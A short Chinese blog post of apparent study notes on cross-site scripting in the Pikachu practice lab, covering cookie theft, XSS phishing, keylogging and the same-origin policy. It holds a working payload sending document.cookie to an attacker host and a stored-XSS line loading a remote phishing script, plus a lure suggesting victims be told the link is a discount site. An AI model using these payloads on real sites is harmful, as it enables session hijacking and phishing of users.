漏洞.doc

cookie获取xss后台使用

   引发用户点击特制url(比如告诉用户这是优惠网),用户点击后进入攻击者指定的自己的页面,返回用户的cookie到攻击者的后台

<script>

document .location='http://192.168.1.15/pkxss/xcookie/cookie.php?cookie='+ document.cookie;

</script>

 构造的url指定链接是后台存储cookiede页面,页面可以重定向到其他页面,不引起用户的怀疑

 

 

 

 

 

 

 

 

 

xss钓鱼

代码

 

在存在存储型xss漏洞的留言板上输入:<script src="http://10.67.1.251/pikachu/pkxss/xfish.php" ></script>

xss获取键盘记录

 

同源策略:两个不同域名之间(跨域)不能使用js进行相互操作。如需进行跨域操作,要进行特殊配置,比如通过:header(“Access-Control-Allow-Origin:x.com)  //允许被x.com跨域请求

下面这些标签不受同源策略限制:

<script src=”..”>//js,加载到本地

<img src=”..”>

<link href=”..”>//css

<iframe src=”..”>//任意资源

 

posted @ 2019-04-21 21:08  A思  阅读(153)  评论(0编辑  收藏  举报